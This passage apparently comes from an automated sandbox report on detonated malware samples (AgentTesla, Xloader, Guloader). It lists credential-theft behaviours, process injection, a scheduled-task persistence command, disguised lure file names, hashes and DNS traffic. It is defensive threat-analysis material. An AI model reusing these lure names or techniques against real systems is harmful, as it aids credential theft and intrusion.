memory/2256-2-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-5-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-4-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-3-0x00007FF89AE10000-0x00007FF89AE20000-memory.dmp
memory/2256-8-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-9-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-10-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-12-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-11-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-13-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
memory/2256-7-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-14-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-16-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-18-0x00007FF8985B0000-0x00007FF8985C0000-memory.dmp
memory/2256-19-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-21-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-20-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-17-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-15-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-6-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-47-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
memory/2256-48-0x00007FF8DAE2D000-0x00007FF8DAE2E000-memory.dmp
memory/2256-49-0x00007FF8DAD90000-0x00007FF8DAF85000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\b8ab77100df80ab2.customDestinations-ms
| MD5 | 7c52d81cb1d43b12fd2df4b1fef0efc6 |
| SHA1 | 514243668197d913f3789e0020dbf75271579dbe |
| SHA256 | ecdba0b3ff658beebd94f387d9b5338a63953e594a49868b6bf69ae34e1545ad |
| SHA512 | 804b81b574e8f68bf0a7425a0b554c49fde7fa712c61c6d8dddedecafb199bdb7d38b7a9ba645666a20d6f30f65e39100f25bd417560fe288a2f392d04bd5ccd |
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240729-en
Max time kernel
60s
Max time network
18s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\IoC\XSG8996380.xls
Network
Files
memory/1172-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/1172-1-0x000000007337D000-0x0000000073388000-memory.dmp
memory/1172-2-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-7-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-4-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-13-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-12-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-11-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-10-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-9-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-8-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-6-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-5-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-3-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-14-0x00000000006A0000-0x00000000007A0000-memory.dmp
memory/1172-15-0x000000007337D000-0x0000000073388000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
152s
Max time network
157s
Command Line
Signatures
Guloader family
Guloader,Cloudeye
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe
"C:\Users\Admin\AppData\Local\Temp\New Order 00027748585 02222022.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 102.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 17.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 249.194.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Temp\nsgA26B.tmp\Math.dll
| MD5 | 85428cf1f140e5023f4c9d179b704702 |
| SHA1 | 1b51213ddbaedfffb7e7f098f172f1d4e5c9efba |
| SHA256 | 8d9a23dd2004b68c0d2e64e6c6ad330d0c648bffe2b9f619a1e9760ef978207a |
| SHA512 | dfe7f9f3030485caf30ec631424120030c3985df778993342a371bf1724fa84aa885b4e466c6f6b356d99cc24e564b9c702c7bcdd33052172e0794c2fdecce59 |
C:\Users\Admin\AppData\Local\Temp\nsgA26B.tmp\System.dll
| MD5 | cff85c549d536f651d4fb8387f1976f2 |
| SHA1 | d41ce3a5ff609df9cf5c7e207d3b59bf8a48530e |
| SHA256 | 8dc562cda7217a3a52db898243de3e2ed68b80e62ddcb8619545ed0b4e7f65a8 |
| SHA512 | 531d6328daf3b86d85556016d299798fa06fefc81604185108a342d000e203094c8c12226a12bd6e1f89b0db501fb66f827b610d460b933bd4ab936ac2fd8a88 |
memory/2720-15-0x0000000003490000-0x0000000003590000-memory.dmp
memory/2720-16-0x0000000003490000-0x0000000003590000-memory.dmp
Analysis: behavioral19
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20241010-en
Max time kernel
120s
Max time network
127s
Command Line
Signatures
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Windows\SysWOW64\rundll32.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\System.dll,#1
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2860 -s 224
Network
Files
Analysis: behavioral21
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
93s
Max time network
158s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 2444 wrote to memory of 2808 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2444 wrote to memory of 2808 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
| PID 2444 wrote to memory of 2808 | N/A | C:\Windows\system32\rundll32.exe | C:\Windows\SysWOW64\rundll32.exe |
Processes
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\Windows.System.Diagnostics.TraceReporting.PlatformDiagnosticActions.dll,#1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
Files
Analysis: behavioral6
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
140s
Max time network
148s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5068 set thread context of 3864 | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2045521122-590294423-3465680274-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"
C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe
"C:\Users\Admin\AppData\Local\Temp\Consignment Document.pdf.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 140.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 197.87.175.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 100.208.201.84.in-addr.arpa | udp |
Files
memory/5068-0-0x000000007466E000-0x000000007466F000-memory.dmp
memory/5068-1-0x00000000002D0000-0x00000000003A2000-memory.dmp
memory/5068-2-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/5068-3-0x0000000004DE0000-0x0000000004DEE000-memory.dmp
memory/5068-4-0x0000000004F40000-0x0000000004FD2000-memory.dmp
memory/5068-5-0x000000007466E000-0x000000007466F000-memory.dmp
memory/5068-6-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/5068-7-0x0000000005280000-0x000000000531C000-memory.dmp
memory/5068-8-0x0000000005650000-0x000000000570C000-memory.dmp
memory/5068-9-0x0000000005710000-0x000000000574C000-memory.dmp
memory/3864-10-0x0000000000400000-0x000000000043C000-memory.dmp
memory/3864-13-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/5068-14-0x0000000074660000-0x0000000074E10000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Consignment Document.pdf.exe.log
| MD5 | e50d61d6d5cec0d2c6b3fbf02b17af2d |
| SHA1 | fcf43f96e7389c27ee201fb00b65db01ca2cee40 |
| SHA256 | a87cf2dbf70a59d3d347f9ca743b6ceb3c805b4714cf4fb963c18b9ca8ffd0a9 |
| SHA512 | 0348b60095cd48d275a5234fe34c1fd7a7c9921e1d92dafea0379d607f898eb1c2e089dafa1db608fad65497fc8f90fa699109b06a5f2c12c0bc8c9192ff9924 |
memory/3864-15-0x0000000005CA0000-0x0000000006244000-memory.dmp
memory/3864-16-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/3864-17-0x0000000005940000-0x0000000005958000-memory.dmp
memory/3864-18-0x0000000006500000-0x0000000006566000-memory.dmp
memory/3864-19-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/3864-20-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/3864-21-0x0000000006C00000-0x0000000006C50000-memory.dmp
memory/3864-22-0x0000000006BE0000-0x0000000006BEA000-memory.dmp
memory/3864-23-0x0000000074660000-0x0000000074E10000-memory.dmp
memory/3864-24-0x0000000074660000-0x0000000074E10000-memory.dmp
Analysis: behavioral7
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20241010-en
Max time kernel
139s
Max time network
19s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 2600 set thread context of 2716 | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"
C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"
Network
Files
memory/2600-0-0x00000000749FE000-0x00000000749FF000-memory.dmp
memory/2600-1-0x0000000000070000-0x000000000015E000-memory.dmp
memory/2600-2-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2600-3-0x0000000000350000-0x0000000000360000-memory.dmp
memory/2600-4-0x00000000749FE000-0x00000000749FF000-memory.dmp
memory/2600-5-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2600-6-0x0000000006050000-0x000000000611C000-memory.dmp
memory/2600-7-0x0000000000840000-0x000000000088E000-memory.dmp
memory/2716-9-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-17-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-15-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-13-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/2716-12-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-11-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-20-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-10-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2716-19-0x0000000000400000-0x000000000043C000-memory.dmp
memory/2600-21-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-22-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-23-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-24-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-25-0x00000000749F0000-0x00000000750DE000-memory.dmp
memory/2716-26-0x00000000749F0000-0x00000000750DE000-memory.dmp
Analysis: behavioral28
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
149s
Max time network
123s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1292 set thread context of 3008 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe |
| PID 3008 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Windows\Explorer.EXE |
| PID 3008 set thread context of 1200 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Windows\Explorer.EXE |
| PID 2656 set thread context of 1200 | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\schtasks.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\NAPSTAT.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
"C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe"
C:\Windows\SysWOW64\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /TN "Updates\IlSblFRyVadI" /XML "C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp"
C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe
"{path}"
C:\Windows\SysWOW64\NAPSTAT.EXE
"C:\Windows\SysWOW64\NAPSTAT.EXE"
Network
Files
memory/1292-3-0x00000000005B0000-0x00000000005BA000-memory.dmp
memory/1292-2-0x0000000074C40000-0x000000007532E000-memory.dmp
memory/1292-1-0x0000000000160000-0x0000000000202000-memory.dmp
memory/1292-0-0x0000000074C4E000-0x0000000074C4F000-memory.dmp
memory/1292-4-0x0000000074C4E000-0x0000000074C4F000-memory.dmp
memory/1292-5-0x0000000074C40000-0x000000007532E000-memory.dmp
memory/1292-6-0x00000000055E0000-0x0000000005664000-memory.dmp
memory/1292-7-0x0000000004160000-0x0000000004190000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\tmpFD33.tmp
| MD5 | 235df9cb13f0e61134099fa3131b4200 |
| SHA1 | 03a5ee592b869bfebd8c9c586c0510d53e6b96a3 |
| SHA256 | 279cb4ce033c1a0d71e0bae2156173a2d648c6c278f5b47bc64e332a702efa6a |
| SHA512 | 36b67e96bbab613f98f27d105607a58e82ea4048d536e8238b3119c3ae200ffaede642ac865918ef30027af51b86c037e57e3f3b3ee9be574993f72f577e1aaf |
memory/3008-11-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3008-13-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3008-15-0x000000007EFDE000-0x000000007EFDF000-memory.dmp
memory/3008-18-0x0000000000400000-0x0000000000429000-memory.dmp
memory/3008-20-0x0000000000800000-0x0000000000B03000-memory.dmp
memory/1292-19-0x0000000074C40000-0x000000007532E000-memory.dmp
memory/3008-23-0x0000000000650000-0x0000000000661000-memory.dmp
memory/3008-22-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1200-24-0x0000000006680000-0x0000000006752000-memory.dmp
memory/3008-27-0x0000000000B30000-0x0000000000B41000-memory.dmp
memory/1200-28-0x0000000006760000-0x000000000688C000-memory.dmp
memory/3008-26-0x0000000000400000-0x0000000000429000-memory.dmp
memory/1200-29-0x0000000006680000-0x0000000006752000-memory.dmp
memory/2656-31-0x0000000000DB0000-0x0000000000DF6000-memory.dmp
memory/2656-30-0x0000000000DB0000-0x0000000000DF6000-memory.dmp
memory/2656-32-0x0000000000080000-0x00000000000A9000-memory.dmp
memory/1200-33-0x0000000006760000-0x000000000688C000-memory.dmp
Analysis: behavioral29
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
153s
Command Line
Signatures
Xloader
Xloader family
Xloader payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2437139445-1151884604-3026847218-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 4988 set thread context of 4072 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe |
| PID 4072 set thread context of 3508 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Windows\Explorer.EXE |
| PID 4072 set thread context of 3508 | N/A | C:\Users\Admin\AppData\Local\Temp\Payment Advice for Outstanding Invoices (2).exe | C:\Windows\Explorer.EXE |
| PID 756 set thread context of 3508 | N/A | C:\Windows\SysWOW64\explorer.exe | C:\Windows\Explorer.EXE |
Enumerates physical storage devices
